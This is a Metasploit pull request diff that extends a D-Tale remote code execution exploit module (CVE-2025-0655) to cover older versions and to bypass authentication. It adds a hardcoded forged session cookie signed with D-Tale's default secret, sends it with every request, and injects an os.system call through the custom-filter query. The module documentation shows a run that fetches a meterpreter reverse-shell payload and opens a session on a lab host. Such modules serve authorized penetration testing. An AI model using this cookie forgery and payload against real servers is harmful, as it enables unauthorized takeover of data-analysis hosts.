Improve:

* Support the prior to 3.13.0 versions
* CVE-2024-3408 bypass for authentication

Author: Takahiro-Yoko

documentation/modules/exploit/linux/http/dtale_rce_cve_2025_0655.md

@@ -13,6 +13,8 @@ The vulnerability affects:
 This module was successfully tested on:
 
     * D-Tale 3.15.1 installed on Ubuntu 24.04
+    * D-Tale 3.12.0 installed on Ubuntu 22.04
+    * D-Tale 3.10.0 installed on Ubuntu 22.04
 
 
 ### Installation
@@ -56,8 +58,8 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
    Name            Current Setting  Required  Description
    ----            ---------------  --------  -----------
    FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
-   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  true             yes       Attempt to run payload without touching disk, Linux ≥3.17 only
    FETCH_SRVHOST                    no        Local IP to use for serving payload
    FETCH_SRVPORT   8080             yes       Local port to use for serving payload
    FETCH_URIPATH                    no        Local URI to use for serving payload
@@ -69,7 +71,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
 
    Name                Current Setting  Required  Description
    ----                ---------------  --------  -----------
-   FETCH_FILENAME      SOizTtsyojZ      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      vxItPQvVMkW      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
 
 
@@ -83,21 +85,21 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=192.168.56.16
+msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=192.168.56.17
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 3.15.1 detected.
 [*] Use data_id: 1
 [*] Updated the enable_custom_filters to true.
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:36278) at 2025-02-23 09:29:16 +0900
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:34796) at 2025-03-01 11:37:14 +0900
 [*] Successfully executed the payload.
 [*] Successfully cleaned up data_id: 1
 
 meterpreter > getuid
 Server username: ubu
 meterpreter > sysinfo
-Computer     : 192.168.56.16
-OS           : Ubuntu 24.04 (Linux 6.8.0-51-generic)
+Computer     : 192.168.56.17
+OS           : Ubuntu 22.04 (Linux 6.8.0-52-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux

modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb

@@ -9,6 +9,14 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
 
+  # forge a cookie in case there was authentication enabled:
+  # import hashlib
+  # from itsdangerous import URLSafeTimedSerializer # pip install itsdangerous
+  # signer_kwargs = { "key_derivation" : "hmac", "digest_method" : staticmethod(hashlib.sha1) }
+  # ser = URLSafeTimedSerializer("Dtale", salt="cookie-session", signer_kwargs=signer_kwargs)
+  # session = ser.dumps({"logged_in" : True, "username" : "whatever"})
+  SESSION = 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoid2hhdGV2ZXIifQ.Z8Jdmw.zUb6b2uEm9ZDKWIOsw2A1xLIuLc'
+
   def initialize(info = {})
     super(
       update_info(
@@ -67,7 +75,10 @@ def initialize(info = {})
   def check
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'dtale/popup/upload')
+      'uri' => normalize_uri(target_uri.path, 'dtale/popup/upload'),
+      'headers' => {
+        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
+      }
     })
     return Exploit::CheckCode::Unknown unless res&.code == 200
 
@@ -103,7 +114,10 @@ def exploit
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'dtale/upload'),
       'ctype' => "multipart/form-data; boundary=#{mime.bound}",
-      'data' => mime.to_s
+      'data' => mime.to_s,
+      'headers' => {
+        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
+      }
     })
     @data_id = res&.get_json_document&.fetch('data_id', nil)
     fail_with(Failure::Unknown, 'Failed to get data_id from response.') unless @data_id
@@ -114,6 +128,9 @@ def exploit
       'uri' => normalize_uri(target_uri.path, "dtale/update-settings/#{@data_id}"),
       'vars_get' => {
         'settings' => { 'enable_custom_filters' => true }.to_json
+      },
+      'headers' => {
+        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
       }
     })
     fail_with(Failure::Unknown, 'Failed to update the settings.') unless res&.get_json_document&.fetch('success', nil)
@@ -125,6 +142,9 @@ def exploit
       'vars_get' => {
         'query' => "@pd.core.frame.com.builtins.__import__('os').system('#{payload.encoded}')",
         'save' => true
+      },
+      'headers' => {
+        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
       }
     })
     print_status('Successfully executed the payload.')
@@ -139,6 +159,9 @@ def cleanup
         'uri' => normalize_uri(target_uri.path, 'dtale/cleanup-datasets'),
         'vars_get' => {
           'dataIds' => @data_id
+        },
+        'headers' => {
+          'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
         }
       })
       print_status("Failed to clean up data_id: #{@data_id}") unless res&.get_json_document&.fetch('success', nil)